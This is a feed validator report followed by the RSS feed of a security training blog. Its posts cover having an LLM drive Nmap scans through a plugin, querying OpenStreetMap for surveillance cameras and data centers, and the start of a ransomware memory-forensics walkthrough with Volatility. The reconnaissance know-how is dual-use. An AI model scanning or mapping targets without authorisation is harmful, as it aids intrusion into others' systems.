FEED Validator

for Atom and RSS and KML

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

line 24, column 85: Image not in required format [help]

... loads/2025/04/cropped-Favicon-32x32.webp</url>
                                             ^

line 81, column 0: content:encoded should not contain fetchpriority attribute [help]
```
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding= ...
```
line 81, column 0: content:encoded should not contain decoding attribute (96 occurrences) [help]
```
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding= ...
```
line 81, column 0: content:encoded should not contain sizes attribute (95 occurrences) [help]
```
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding= ...
```
line 129, column 0: content:encoded should not contain loading attribute (93 occurrences) [help]
```
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async ...
```

Source: https://www.hackers-arise.com/blog-feed.xml

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Hackers Arise</title>
<atom:link href="https://hackers-arise.com/feed/" rel="self" type="application/rss+xml" />
<link>https://hackers-arise.com</link>
<description>EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS</description>
<lastBuildDate>Tue, 14 Oct 2025 16:21:32 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>
hourly </sy:updatePeriod>
<sy:updateFrequency>
1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.8.3</generator>
<image>
<url>https://hackers-arise.com/wp-content/uploads/2025/04/cropped-Favicon-32x32.webp</url>
<title>Hackers Arise</title>
<link>https://hackers-arise.com</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>Artificial Intelligence in Cybersecurity: Using AI for Port Scanning</title>
<link>https://hackers-arise.com/artificial-intelligence-in-cybersecurity-using-ai-for-port-scanning/</link>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Tue, 14 Oct 2025 16:21:30 +0000</pubDate>
<category><![CDATA[OSINT & Reconnaissance]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18734</guid>
<description><![CDATA[Welcome back, aspiring cyberwarriors! Nmap has been the gold standard of network scanning for decades, and over this time, it has obtained hundreds of command-line options and NSE scripts. It’s great from one side, you can tailor the command for your needs, but on the other side, it requires expertise. What if you could simply […]
The post <a href="https://hackers-arise.com/artificial-intelligence-in-cybersecurity-using-ai-for-port-scanning/">Artificial Intelligence in Cybersecurity: Using AI for Port Scanning</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors!
Nmap has been the gold standard of network scanning for decades, and over this time, it has obtained hundreds of command-line options and NSE scripts. It’s great from one side, you can tailor the command for your needs, but on the other side, it requires expertise. What if you could simply tell an AI in plain English what you want to discover, and have it automatically select the right Nmap commands, parse the results, and identify security issues?
That’s exactly what the LLM-Tools-Nmap utility does. Basically, it bridges the gap between Large Language Models (LLMs) and Nmap.
Let’s explore how to use this tool and which features it has.
<h2 class="wp-block-heading">Step #1: Let’s Take a Closer Look at What LLM-Tools-Nmap Is</h2>
LLM-Tools-Nmap is a plugin for Simon Willison’s llm command-line tool that provides Nmap network scanning capabilities through AI function calling. The llm CLI tool is used for interacting with OpenAI, Gemini, and dozens of other LLMs. LLM-Tools-Nmap enables LLMs to “intelligently” control Nmap, selecting appropriate scan types, options, and NSE scripts based on natural language instructions.
The key innovation here is tool use or function calling – the ability for an LLM to not just generate text, but to execute actual commands and interpret their results. The AI becomes an intelligent wrapper around Nmap, translating your intent into proper scanning commands.
<h2 class="wp-block-heading">Step #2: Installing LLM-Tools-Nmap</h2>
Kali Linux 2025.3 release already has this tool in its repository. But if you’re using an older version, consider installing it manually from GitHub.
<code>kali> git clone https://github.com/peter-hackertarget/llm-tools-nmap.git</code>
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="872" height="233" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo.webp" alt="" class="wp-image-18735" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo.webp 872w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo-300x80.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo-768x205.webp 768w" sizes="(max-width: 872px) 100vw, 872px" /></figure>
<code>kali> llm-tools-nmap</code>
Next, we need to install a core–llm CLI tool. It can be done via pip. I’m going to do so via pipx for an isolated environment.
<code>kali> pipx install llm</code>
<figure class="wp-block-image size-full"><img decoding="async" width="871" height="179" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm.webp" alt="" class="wp-image-18736" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm.webp 871w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm-300x62.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm-768x158.webp 768w" sizes="(max-width: 871px) 100vw, 871px" /></figure>
Verify the installation:
<code>kali> llm –version</code>
<figure class="wp-block-image aligncenter size-full"><img decoding="async" width="422" height="170" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_check_llm_version.webp" alt="" class="wp-image-18737" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_check_llm_version.webp 422w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_check_llm_version-300x121.webp 300w" sizes="(max-width: 422px) 100vw, 422px" /></figure>
<h2 class="wp-block-heading">Step #3: Configure an LLM Model</h2>
You must configure an LLM model before using the llm-tools-nmap. By default, the LLM tool tries to use OpenAI, which requires an API key. If you don’t want to pay for a paid OpenAI account, you can install local models via Ollama—just keep in mind that this requires appropriate hardware. Alternatively, you can use Google Gemini, which offers a free tier; that’s the option I’ll be using.
To use Gemini in llm-tools-nmap, you need to install the plugin:
<code>kali> llm install llm-gemini</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="849" height="266" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin.webp" alt="" class="wp-image-18738" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin.webp 849w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin-300x94.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin-768x241.webp 768w" sizes="(max-width: 849px) 100vw, 849px" /></figure>
Next, we need to obtain an API key. That can be done on the following page: <a href="https://aistudio.google.com/apikey.">https://aistudio.google.com/apikey.</a>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="247" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-1024x247.webp" alt="" class="wp-image-18739" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-1024x247.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-300x72.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-768x185.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-1536x370.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key.webp 1868w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Then set it:
<code>kali> llm keys set gemini</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="855" height="174" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api.webp" alt="" class="wp-image-18740" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api.webp 855w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api-300x61.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api-768x156.webp 768w" sizes="(max-width: 855px) 100vw, 855px" /></figure>
Now, we can verify Gemini is available:
<code>kali> llm models</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="862" height="482" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules.webp" alt="" class="wp-image-18741" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules.webp 862w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules-300x168.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules-768x429.webp 768w" sizes="(max-width: 862px) 100vw, 862px" /></figure>
You should see an output similar to the above. From the list, you can choose the model that sets it as the default one.
<code>kali> llm models default gemini-x.x-xxxx</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="849" height="155" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model.webp" alt="" class="wp-image-18742" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model.webp 849w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model-300x55.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model-768x140.webp 768w" sizes="(max-width: 849px) 100vw, 849px" /></figure>
<h2 class="wp-block-heading">Step #4: Understanding the Function-Calling Architecture</h2>
A generalized diagram of how llm-tools-nmap works under the hood is shown below:
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="234" height="1024" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_diagram-234x1024.webp" alt="" class="wp-image-18743"/></figure>
The process begins when the user supplies a natural-language instruction. The AI then interprets the intent, deciding which Nmap functions are needed, and the plugin executes the appropriate Nmap commands on the target. Once Nmap finishes, its output is captured and sent back to the LLM, which analyzes the results and translates them into a clear, natural-language summary for the user.
The plugin provides eight core functions:
get_local_network_info(): Discovers network interfaces and suggests scan ranges nmap_quick_scan(target): Fast scan of common ports nmap_port_scan(target, ports): Scan specific ports nmap_service_detection(target, ports): Service version detection nmap_os_detection(target): Operating system fingerprinting nmap_ping_scan(target): Host discovery nmap_script_scan(target, script, ports): Run NSE scripts nmap_scan(target, options): Generic Nmap with custom options
The AI automatically selects which functions to use based on your query.
<h2 class="wp-block-heading">Step #5: Getting Started with Llm-tools-nmap</h2>
Let’s find live hosts on the network:
<code>kali> llm --functions llm-tools-nmap.py "Scan my local network to find live hosts"</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="950" height="479" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts.webp" alt="" class="wp-image-18744" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts.webp 950w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts-300x151.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts-768x387.webp 768w" sizes="(max-width: 950px) 100vw, 950px" /></figure>
Good. Now, let’s do a rapid recon of a target:
<code>kali> llm --functions llm-tools-nmap.py "Do a quick port scan of <IP>"</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="941" height="323" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan.webp" alt="" class="wp-image-18745" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan.webp 941w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan-300x103.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan-768x264.webp 768w" sizes="(max-width: 941px) 100vw, 941px" /></figure>
This executes a fast scan (-T4 -F) of common ports.
Next, let’s try to do a multistage recon:
<code>kali> llm --functions llm-tools-nmap.py "What services are running on <IP>? Gather as much information as you can and identify any security issues or items of interest to a security analyst"</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="937" height="780" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1.webp" alt="" class="wp-image-18746" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1.webp 937w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1-300x250.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1-768x639.webp 768w" sizes="(max-width: 937px) 100vw, 937px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="938" height="645" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2.webp" alt="" class="wp-image-18747" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2.webp 938w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2-300x206.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2-768x528.webp 768w" sizes="(max-width: 938px) 100vw, 938px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="942" height="572" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3.webp" alt="" class="wp-image-18748" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3.webp 942w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3-300x182.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3-768x466.webp 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
The AI will first carry out an initial port scan, then run service detection on any ports that are found open. After that, it executes the relevant NSE scripts and analyzes the resulting data for security implications. Finally, it presents a comprehensive report that highlights any identified vulnerabilities.
<h2 class="wp-block-heading">Summary</h2>
Someone who reads this article might start arguing that AI could replace pentesters. While this tool demonstrates how AI can simplify hacking and reconnaissance—allowing you to type a single English sentence and have Nmap begin scanning—it is far from a substitute for a skilled hacker. An experienced professional understands Nmap’s myriad flags and can think creatively to adapt scans to complex scenarios.The post <a href="https://hackers-arise.com/artificial-intelligence-in-cybersecurity-using-ai-for-port-scanning/">Artificial Intelligence in Cybersecurity: Using AI for Port Scanning</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>OSINT: Finding Surveillance Cameras with Overpass Turbo</title>
<link>https://hackers-arise.com/osint-finding-surveillance-cameras-with-overpass-turbo/</link>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Mon, 13 Oct 2025 14:13:52 +0000</pubDate>
<category><![CDATA[OSINT & Reconnaissance]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18624</guid>
<description><![CDATA[Welcome back, aspiring cyberwarriors! In the reconnaissance phase of any security engagement, information gathering is paramount. Previously, we discussed using Google Earth Pro for investigations. Today, let’s shift our focus from satellite OSINT to map‑based reconnaissance. Many of you are already familiar with Google Maps and its alternatives, such as OpenStreetMap (OSM). But did you know that you can […]
The post <a href="https://hackers-arise.com/osint-finding-surveillance-cameras-with-overpass-turbo/">OSINT: Finding Surveillance Cameras with Overpass Turbo</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors!
In the reconnaissance phase of any security engagement, information gathering is paramount. Previously, we discussed using <a href="https://hackers-arise.com/open-source-intelligence-osint-using-google-earth-pro-satellite-imagery-for-investigations/" title="">Google Earth Pro</a> for investigations. Today, let’s shift our focus from satellite OSINT to map‑based reconnaissance. Many of you are already familiar with Google Maps and its alternatives, such as OpenStreetMap (OSM). But did you know that you can easily extract specific data from OSM, like surveillance cameras or Wi‑Fi hotspots, using a tool called Overpass Turbo?
Let’s explore how to leverage this powerful reconnaissance tool.
<h2 class="wp-block-heading">Step #1: Understanding Overpass Turbo Basics</h2>
 Overpass Turbo is accessible at<a href=" https://overpass-turbo.eu"> https://overpass-turbo.eu</a> and requires no installation or registration. It provides a web-based interface for querying the Overpass API, which is OpenStreetMap’s data extraction engine.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="502" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-1024x502.webp" alt="" class="wp-image-18625" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-1024x502.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-300x147.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-768x376.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-1536x752.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page.webp 1880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
The interface consists of three main components:
Query Editor (left side): Where you write your queries using the Overpass Query Language (QL)
Interactive Map (right side): Displays your query results geographically
Toolbar (top): Contains the Run button, Wizard, Export options, and settings
When you first access Overpass Turbo, you’ll see a default query loaded in the editor. The map displays the current viewport, which you can pan and zoom to focus on your area of interest.
<h3 class="wp-block-heading">The Query Wizard</h3>
For beginners, the Wizard tool (accessible from the toolbar) provides a simplified interface. You can enter search terms in plain English, and the Wizard converts them into proper Overpass QL syntax. For example:
Type: amenity=atm in London
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="888" height="543" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard.webp" alt="" class="wp-image-18626" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard.webp 888w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard-300x183.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard-768x470.webp 768w" sizes="(max-width: 888px) 100vw, 888px" /></figure>
Click “build and run query”.
The Wizard generates the appropriate query syntax and executes it automatically.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="501" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-1024x501.webp" alt="" class="wp-image-18627" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-1024x501.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-300x147.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-768x376.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-1536x752.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results.webp 1879w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
As a result, we can see a map of ATMs in London.
<h2 class="wp-block-heading">Step #2: Writing Overpass Queries</h2>
Overpass Query Language follows a specific structure. Let’s break down the anatomy of our query built by a wizard:
<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained">
<pre class="wp-block-code"><code>[out:json][timeout:25];
// fetch area “London” to search in
{{geocodeArea:London}}->.searchArea;
// gather results
nwr["amenity"="atm"](area.searchArea);
// print results
out geom;</code></pre>
It already includes comments, but for better understanding, let’s dive a bit deeper.
<code>[out:json][timeout:25]</code> – Sets the output format to JSON and limits the server-side execution time to 25 seconds.
<code>{{geocodeArea:London}}→.searchArea;</code> – A macro that resolves the administrative boundary of London (its OSM relation). The result is stored in a temporary set named <code>.searchArea</code> for later reference.
<code>nwr["amenity"="atm"](area.searchArea);</code> – <code>nwr</code> stands for nodes, ways, and relations.
OpenStreetMap has three element types: • Node: Single-point locations (e.g., cameras, WiFi access points) • Way: Lines and closed shapes (e.g., roads, building outlines) • Relation: Groups of nodes and ways (e.g., building complexes, campuses)
The filter <code>["amenity"="atm"]</code> selects all OSM elements tagged as ATMs. <code>(area.searchArea)</code> restricts the search to the previously defined London area.
<code>out geom;</code> – Outputs the matching elements, including their full geometry (<code>geom</code>)—points with latitude/longitude, ways with their node lists, and relations with their member geometries.
</div>
<h3 class="wp-block-heading">Tag Filters</h3>
The core of your reconnaissance queries are the tag filters. Tags in OSM follow a key=value structure.
<code>node["key"="value"]</code>
By opening the page at <a href="https://wiki.openstreetmap.org/wiki/Map_features">https://wiki.openstreetmap.org/wiki/Map_features</a>
you can view a comprehensive list of possible keys and values. From a hacker’s perspective, you can examine the <code>man_made</code> key to discover surveillance‑related options.
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="316" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-1024x316.webp" alt="" class="wp-image-18628" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-1024x316.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-300x93.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-768x237.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-1536x475.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki.webp 1673w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Now, let’s edit out query and try to find out surveillance cameras in California.
<pre class="wp-block-code"><code>[out:json][timeout:25];
{{geocodeArea:California}}->.searchArea;
nwr["surveillance"="camera"](area.searchArea);
out geom;</code></pre>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="443" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-1024x443.webp" alt="" class="wp-image-18629" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-1024x443.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-300x130.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-768x332.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-1536x664.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras.webp 1872w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Now, let’s try to find data centers in Moscow.
<pre class="wp-block-code"><code>[out:json][timeout:25];
{{geocodeArea:Moscow}}->.searchArea;
nwr["building"="data_center"](area.searchArea);
out geom;</code></pre>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="421" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-1024x421.webp" alt="" class="wp-image-18630" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-1024x421.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-300x123.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-768x316.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-1536x631.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers.webp 1871w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h2 class="wp-block-heading">Summary</h2>
By querying and visualizing crowdsourced data from OpenStreetMap, investigators can significantly boost their productivity. Overpass Turbo is especially useful for tasks such as tracking urban development, examining the surveillance landscape, and many other applications. In each use case, users can precisely tailor their queries to extract specific data points from the vast repository of geographic information available on OpenStreetMap.
If you’d like to advance in OSINT, consider checking out our <a href="https://hackersarise.thinkific.com/courses/osint-training" title="">OSINT training class</a>.
The post <a href="https://hackers-arise.com/osint-finding-surveillance-cameras-with-overpass-turbo/">OSINT: Finding Surveillance Cameras with Overpass Turbo</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Digital Forensics: Investigating a Ransomware Attack</title>
<link>https://hackers-arise.com/digital-forensics-investigating-a-ransomware-attack/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Thu, 09 Oct 2025 13:46:32 +0000</pubDate>
<category><![CDATA[Digital Forensics]]></category>
<category><![CDATA[artifact preservation]]></category>
<category><![CDATA[chain-of-custody]]></category>
<category><![CDATA[command-line forensics]]></category>
<category><![CDATA[forensic tools]]></category>
<category><![CDATA[handles]]></category>
<category><![CDATA[in-memory extraction]]></category>
<category><![CDATA[incident-response]]></category>
<category><![CDATA[IOCs]]></category>
<category><![CDATA[malfind]]></category>
<category><![CDATA[malware hashing]]></category>
<category><![CDATA[Memory Forensics]]></category>
<category><![CDATA[netscan]]></category>
<category><![CDATA[process forensics]]></category>
<category><![CDATA[process-tree]]></category>
<category><![CDATA[RAM analysis]]></category>
<category><![CDATA[Ransomware]]></category>
<category><![CDATA[sandboxing]]></category>
<category><![CDATA[volatile-data]]></category>
<category><![CDATA[Volatility3]]></category>
<category><![CDATA[WannaCry]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18593</guid>
<description><![CDATA[Analyzing a memory dump after a ransomware attack with Volatility to find processes, parent–child chains, injected code, and other valuable artifacts
The post <a href="https://hackers-arise.com/digital-forensics-investigating-a-ransomware-attack/">Digital Forensics: Investigating a Ransomware Attack</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring forensic investigators! 
We continue our practical series on digital forensics and will look at the memory dump of a Windows machine after a ransomware attack. Ransomware incidents are common, although they may not always be the most profitable attacks because they require a lot of effort and stealth. Some operations take months of hard work and sleepless nights and still never pay off. Many attackers prefer to steal data and sell it on the dark web. Such data sells well and quickly. State sponsored APTs act similarly. Their goal is to stay silent and extract as much intelligence as possible.
Today, a thousand unique entries of private information of Russian citizens cost about $100. That’s cheap. But it also shows how effective Ukrainian and foreign hackers are against Russia. All this raises demand for digital forensics and incident response, since fines for data leaks can be enormous. It’s not only fines that are a threat. Reputation damage is critical. If your competitor has never, at least yet, experienced a data breach and you did and it went public, trust in your company will start crumbling and customers will be inclined to use your competitors’ services. An even worse scenario is a ransomware attack that locks down much of your organization and wipes out your backups. Paying the attackers gives no guarantee of recovering your data, and some companies never manage to recover at all.
So let’s investigate one of those attacks and learn something new to stay sharp.
<h2 class="wp-block-heading">Memory Analysis</h2>
It all begins with a memory dump. Here we already have a memory dump file of an infected machine that we are going to inspect.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="796" height="151" src="https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump.webp" alt="showing the memory dump after a ransomware attack" class="wp-image-18594" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump.webp 796w, https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump-300x57.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/1-memory-dump-768x146.webp 768w" sizes="(max-width: 796px) 100vw, 796px" /></figure>
<h3 class="wp-block-heading">Installing Volatility</h3>
On our Kali machine we created a new Python virtual environment for Volatility. Keeping separate environments is good practice because it prevents tools from interfering with other dependencies. Sometimes installing one tool can break another. Here is how you do it:
<code>bash$ > python3 -m venv env_name</code>
<code>bash$ > source env_name/bin/activate</code>
Now we are ready to install Volatility in this environment:
<code>bash$ > pip3 install volatility3</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="986" height="238" src="https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility.webp" alt="installing Volatility 3" class="wp-image-18595" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility.webp 986w, https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility-300x72.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/2-installing-volatility-768x185.webp 768w" sizes="(max-width: 986px) 100vw, 986px" /></figure>
It is also good practice to record the exact versions of Volatility and Python you used (for example, <code>pip3 show volatility3</code> and <code>python3 --version</code>). Memory forensics tools change over time and some plugins behave slightly differently between releases. Recording versions makes your work reproducible later.
<h3 class="wp-block-heading">Image Information</h3>
One of the first things we look at after receiving a memory dump is the captured metadata. The Volatility 3 command is simple:
<code>bash$ vol -f infected.vmem windows.info</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="409" src="https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-1024x409.webp" alt="getting the image info and metadata with Volatility 3" class="wp-image-18597" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-1024x409.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-768x307.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture-1536x613.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/3-getting-the-image-info-and-metadate-of-the-capture.webp 1625w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
When you run <code>windows.info</code>, inspect the OS build, memory size, and timestamps shown by the capture tool. That OS build value helps Volatility pick the correct symbol tables. Incorrect symbols can cause missing or malformed output. This is especially important if you are working with Volatility 2. Also confirm the capture method and metadata such as who made the capture, when, and whether the capture was acquired after isolating the machine. Recording this chain-of-custody metadata is a small step that greatly strengthens any forensic report.
<h3 class="wp-block-heading">Processes</h3>
The goal of the memory dump is to preserve processes, injections, and shellcode before they disappear after a reboot. That means we need to focus on the processes that existed at capture time. Let’s list them all:
<code>bash$ > vol -f infected.vmem windows.pslist</code>
